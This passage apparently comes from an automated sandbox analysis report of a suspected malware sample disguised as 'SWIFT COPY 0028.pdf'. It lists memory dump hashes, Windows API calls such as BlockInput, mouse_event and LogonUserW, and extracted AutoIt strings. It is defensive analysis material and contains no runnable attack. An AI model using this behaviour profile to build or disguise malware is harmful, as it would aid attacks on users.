                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 62295120a0c82eb61876b5269b8f1913ec718125d55422812e9cc17f2fc5db3b
                                                                                    • Instruction ID: 59bbfea69e3b0b04d4c51e2a7b8666004aec50049e362ce81845a2658e21c20c
                                                                                    • Opcode Fuzzy Hash: 62295120a0c82eb61876b5269b8f1913ec718125d55422812e9cc17f2fc5db3b
                                                                                    • Instruction Fuzzy Hash: AB320326D2AF014DD7239634D972336A29CEFB73D4F15D727E819B5AAAEF28C4835100
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: __itow__swprintf
                                                                                    • String ID:
                                                                                    • API String ID: 674341424-0
                                                                                    • Opcode ID: 985577c7894862c986fe02a86248c88adacaedcb8715ee5d448e6ae9b232ffa2
                                                                                    • Instruction ID: 940ceabbab242c8fe3f79f6cd38325ee58ae6e86125240e388c638f79db28361
                                                                                    • Opcode Fuzzy Hash: 985577c7894862c986fe02a86248c88adacaedcb8715ee5d448e6ae9b232ffa2
                                                                                    • Instruction Fuzzy Hash: A222ABB16083119FDB24DF18D890B6FB7E8AFC4310F10492DF89A97291DB71E944CB92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4e51251d564f4e6cdf8ffd2d7408798e4ef1191774534e599b9762a3f6b63e60
                                                                                    • Instruction ID: c6d617a825c727503e025aa75002e21fbda58dd7912117a860efca46e9557969
                                                                                    • Opcode Fuzzy Hash: 4e51251d564f4e6cdf8ffd2d7408798e4ef1191774534e599b9762a3f6b63e60
                                                                                    • Instruction Fuzzy Hash: 9AB1C120D3AF414DD623A6398931336B65CAFBB2E5B92D71BFC1A74D62EB2185835180
                                                                                    APIs
                                                                                    • __time64.LIBCMT ref: 0096B6DF
                                                                                      • Part of subcall function 0094344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0096BDC3,00000000,?,?,?,?,0096BF70,00000000,?), ref: 00943453
                                                                                      • Part of subcall function 0094344A: __aulldiv.LIBCMT ref: 00943473
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                    • String ID:
                                                                                    • API String ID: 2893107130-0
                                                                                    • Opcode ID: 427b105c934e90df0424fb83fbcdb929e305105549d62fa0f193aa1d8acde61c
                                                                                    • Instruction ID: 7487e623ff7991889a93ac99dad7b86ac6ded4c26d7ea84300312a957d2e1458
                                                                                    • Opcode Fuzzy Hash: 427b105c934e90df0424fb83fbcdb929e305105549d62fa0f193aa1d8acde61c
                                                                                    • Instruction Fuzzy Hash: B1219D72634510CBC729CF28C881A92B7E5EB95320B648E6DE0E5CF2C0DB74AE45DB54
                                                                                    APIs
                                                                                    • BlockInput.USER32(00000001), ref: 00976ACA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: BlockInput
                                                                                    • String ID:
                                                                                    • API String ID: 3456056419-0
                                                                                    • Opcode ID: 322e52938906d110cf6a2ef524444eb3cde555f3add5cced26e4e58a9984e3a8
                                                                                    • Instruction ID: 2b9a4529ed6c3f0ab7849d1b43fc1ea0e606d1d4487604ff141434f611f04d0f
                                                                                    • Opcode Fuzzy Hash: 322e52938906d110cf6a2ef524444eb3cde555f3add5cced26e4e58a9984e3a8
                                                                                    • Instruction Fuzzy Hash: E9E04836210214AFC700EF59D404E56B7ECAFB4751F04C856F949D7251DAB0F8048BA0
                                                                                    APIs
                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 009674DE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: mouse_event
                                                                                    • String ID:
                                                                                    • API String ID: 2434400541-0
                                                                                    • Opcode ID: d152abab72d4e9f49758d8bdb952e4ee4ec5df80e0dabd56c2c7b86648936a29
                                                                                    • Instruction ID: 9ac5b53633f0d9f1ca5f11e49d7181e40331bca2675d25266949a9e183d006d4
                                                                                    • Opcode Fuzzy Hash: d152abab72d4e9f49758d8bdb952e4ee4ec5df80e0dabd56c2c7b86648936a29
                                                                                    • Instruction Fuzzy Hash: E6D05EA053C30538EC2807A48C0FF7A990EF3007C8F809689B082C94E1FC845801A132
APIs
• LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0095AD3E), ref: 0095B124
Similarity
• API ID: LogonUser
• API String ID: 1244722697-0
Similarity
• API ID: NameUser
• API String ID: 2645101109-0
APIs
• SetUnhandledExceptionFilter.KERNEL32(?), ref: 0094818F
Similarity
• API ID: ExceptionFilterUnhandled
• API String ID: 3192549508-0
Similarity
• API ID: Exception@8Throwstd::exception::exception
• API String ID: 3728558374-0
Memory Dump Source
• Source File: 00000000.00000002.2160878621.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1024000_SWIFT COPY 0028_pdf.jbxd
APIs
• DeleteObject.GDI32(00000000), ref: 0097A2FE
• DeleteObject.GDI32(00000000), ref: 0097A310
• DestroyWindow.USER32 ref: 0097A31E
• GetDesktopWindow.USER32 ref: 0097A338
• GetWindowRect.USER32(00000000), ref: 0097A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0097A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0097A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A4D8
• GetClientRect.USER32(00000000,?), ref: 0097A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0097A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A55E
• GlobalLock.KERNEL32(00000000), ref: 0097A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A576
• GlobalUnlock.KERNEL32(00000000), ref: 0097A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A586
• GlobalFree.KERNEL32(00000000), ref: 0097A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,009AD9BC,00000000), ref: 0097A5B9
• GlobalFree.KERNEL32(00000000), ref: 0097A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0097A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0097A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0097A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
• Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
APIs
• SetTextColor.GDI32(?,00000000), ref: 0098D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0098D30C
• GetSysColor.USER32(0000000F), ref: 0098D318
• SetBkColor.GDI32(?,000000FF), ref: 0098D332
• SelectObject.GDI32(?,00000000), ref: 0098D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0098D36C
• GetSysColor.USER32(00000010), ref: 0098D374
• CreateSolidBrush.GDI32(00000000), ref: 0098D37B
• FrameRect.USER32(?,?,00000000), ref: 0098D38A
• DeleteObject.GDI32(00000000), ref: 0098D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0098D3DC
• FillRect.USER32(?,?,00000000), ref: 0098D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0098D439
  • Part of subcall function 0098D575: GetSysColor.USER32(00000012), ref: 0098D5AE
  • Part of subcall function 0098D575: SetTextColor.GDI32(?,?), ref: 0098D5B2
  • Part of subcall function 0098D575: GetSysColorBrush.USER32(0000000F), ref: 0098D5C8
  • Part of subcall function 0098D575: GetSysColor.USER32(0000000F), ref: 0098D5D3
  • Part of subcall function 0098D575: GetSysColor.USER32(00000011), ref: 0098D5F0
  • Part of subcall function 0098D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098D5FE
  • Part of subcall function 0098D575: SelectObject.GDI32(?,00000000), ref: 0098D60F
  • Part of subcall function 0098D575: SetBkColor.GDI32(?,00000000), ref: 0098D618
  • Part of subcall function 0098D575: SelectObject.GDI32(?,?), ref: 0098D625
  • Part of subcall function 0098D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0098D644
  • Part of subcall function 0098D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098D65B
  • Part of subcall function 0098D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0098D670
  • Part of subcall function 0098D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098D698
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0096DBD6
• GetDriveTypeW.KERNEL32(?,009BDC54,?,\\.\,009BDC00), ref: 0096DCC3
• SetErrorMode.KERNEL32(00000000,009BDC54,?,\\.\,009BDC00), ref: 0096DE29
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0098C788
• SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0098C83E
• SendMessageW.USER32(?,00001102,00000002,?), ref: 0098C859
• SendMessageW.USER32(?,000000F1,?,00000000), ref: 0098CB15
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: MessageSend$Window
• String ID: 0
APIs
• CharUpperBuffW.USER32(?,?,009BDC00), ref: 00986449
Strings
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
Similarity
• API ID: BuffCharUpper
• String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
APIs
• GetSysColor.USER32(00000012), ref: 0098D5AE
• SetTextColor.GDI32(?,?), ref: 0098D5B2
• GetSysColorBrush.USER32(0000000F), ref: 0098D5C8
• GetSysColor.USER32(0000000F), ref: 0098D5D3
• CreateSolidBrush.GDI32(?), ref: 0098D5D8
• GetSysColor.USER32(00000011), ref: 0098D5F0
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 0098D5FE
• SelectObject.GDI32(?,00000000), ref: 0098D60F
• SetBkColor.GDI32(?,00000000), ref: 0098D618
• SelectObject.GDI32(?,?), ref: 0098D625
• InflateRect.USER32(?,000000FF,000000FF), ref: 0098D644
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0098D65B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0098D670
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0098D698
• GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0098D6BF
• InflateRect.USER32(?,000000FD,000000FD), ref: 0098D6DD
• DrawFocusRect.USER32(?,?), ref: 0098D6E8
• GetSysColor.USER32(00000011), ref: 0098D6F6
• SetTextColor.GDI32(?,00000000), ref: 0098D6FE
• DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0098D712
• SelectObject.GDI32(?,0098D2A5), ref: 0098D729
• DeleteObject.GDI32(?), ref: 0098D734
• SelectObject.GDI32(?,?), ref: 0098D73A
• DeleteObject.GDI32(?), ref: 0098D73F
• SetTextColor.GDI32(?,?), ref: 0098D745
• SetBkColor.GDI32(?,?), ref: 0098D74F
Memory Dump Source
• Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                    • String ID:
                                                                                    • API String ID: 1996641542-0
                                                                                    • Opcode ID: 0fed6ad47beb4379c6c2e240184163fe5a7cc41b148eab11ced3cf18d57a5667
                                                                                    • Instruction ID: 4a24ca0276820eac8f24dda9e9c42db372367e3766f742bc39c3a627f2bd8291
                                                                                    • Opcode Fuzzy Hash: 0fed6ad47beb4379c6c2e240184163fe5a7cc41b148eab11ced3cf18d57a5667
                                                                                    • Instruction Fuzzy Hash: 8A515B72916208BFDF10AFA8DC48EAE7B79EF09320F114515F916AB2E0D7759A40DF90
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0098B7B0
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098B7C1
                                                                                    • CharNextW.USER32(0000014E), ref: 0098B7F0
                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0098B831
                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0098B847
                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0098B858
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0098B875
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0098B8C7
                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0098B8DD
                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 0098B90E
                                                                                    • _memset.LIBCMT ref: 0098B933
                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0098B97C
                                                                                    • _memset.LIBCMT ref: 0098B9DB
                                                                                    • SendMessageW.USER32 ref: 0098BA05
                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0098BA5D
                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 0098BB0A
                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0098BB2C
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 0098BB76
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0098BBA3
                                                                                    • DrawMenuBar.USER32(?), ref: 0098BBB2
                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 0098BBDA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                    • String ID: 0
                                                                                    • API String ID: 1073566785-4108050209
                                                                                    • Opcode ID: 19366d7d78e54c54f98714091292b2ebf570d2e58a74598df1abf58c547937ff
                                                                                    • Instruction ID: c2a202aa9aad99b05dbea113a03f09addf9b01791f03975cb9e0f3f8f93fa60a
                                                                                    • Opcode Fuzzy Hash: 19366d7d78e54c54f98714091292b2ebf570d2e58a74598df1abf58c547937ff
                                                                                    • Instruction Fuzzy Hash: 7AE18D71900219ABDF20AF65CC84EEE7BBCFF45724F188156FA19AA390D7748A41DF60
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 0098778A
                                                                                    • GetDesktopWindow.USER32 ref: 0098779F
                                                                                    • GetWindowRect.USER32(00000000), ref: 009877A6
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00987808
                                                                                    • DestroyWindow.USER32(?), ref: 00987834
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0098785D
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0098787B
                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 009878A1
                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 009878B6
                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 009878C9
                                                                                    • IsWindowVisible.USER32(?), ref: 009878E9
                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00987904
                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00987918
                                                                                    • GetWindowRect.USER32(?,?), ref: 00987930
                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00987956
                                                                                    • GetMonitorInfoW.USER32 ref: 00987970
                                                                                    • CopyRect.USER32(?,?), ref: 00987987
                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 009879F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                    • String ID: ($0$tooltips_class32
                                                                                    • API String ID: 698492251-4156429822
                                                                                    • Opcode ID: 5ae03c05b71313ffa74fe798a73c23836b22cc289e26d07084fb7ccadc926520
                                                                                    • Instruction ID: 6078450146aa6f314b7ee649b747dea21d372744fcf86a3c8dad1f7db5ca591e
                                                                                    • Opcode Fuzzy Hash: 5ae03c05b71313ffa74fe798a73c23836b22cc289e26d07084fb7ccadc926520
                                                                                    • Instruction Fuzzy Hash: 5DB1A171608311AFDB04EFA4D988B5AFBE4FF89310F10891DF59A9B291D771E804CB92
                                                                                    APIs
                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00966CFB
                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00966D21
                                                                                    • _wcscpy.LIBCMT ref: 00966D4F
                                                                                    • _wcscmp.LIBCMT ref: 00966D5A
                                                                                    • _wcscat.LIBCMT ref: 00966D70
                                                                                    • _wcsstr.LIBCMT ref: 00966D7B
                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00966D97
                                                                                    • _wcscat.LIBCMT ref: 00966DE0
                                                                                    • _wcscat.LIBCMT ref: 00966DE7
                                                                                    • _wcsncpy.LIBCMT ref: 00966E12
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    • Opcode ID: a9dd672ed10ca5449f6079a963a3f4bcc92325f6a288ef7c14470a3440930832
                                                                                    • Instruction ID: 13c9f83035b3e071a75665d59df2262b45ad1f82a9638bebcda714c9c7318b39
                                                                                    • Opcode Fuzzy Hash: a9dd672ed10ca5449f6079a963a3f4bcc92325f6a288ef7c14470a3440930832
                                                                                    • Instruction Fuzzy Hash: 7C41F672A40201BBEB01AB64DD47FBF777CEFC1714F04406AF905A2182EB75DA01D6A6
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0093A939
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 0093A941
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0093A96C
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 0093A974
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 0093A999
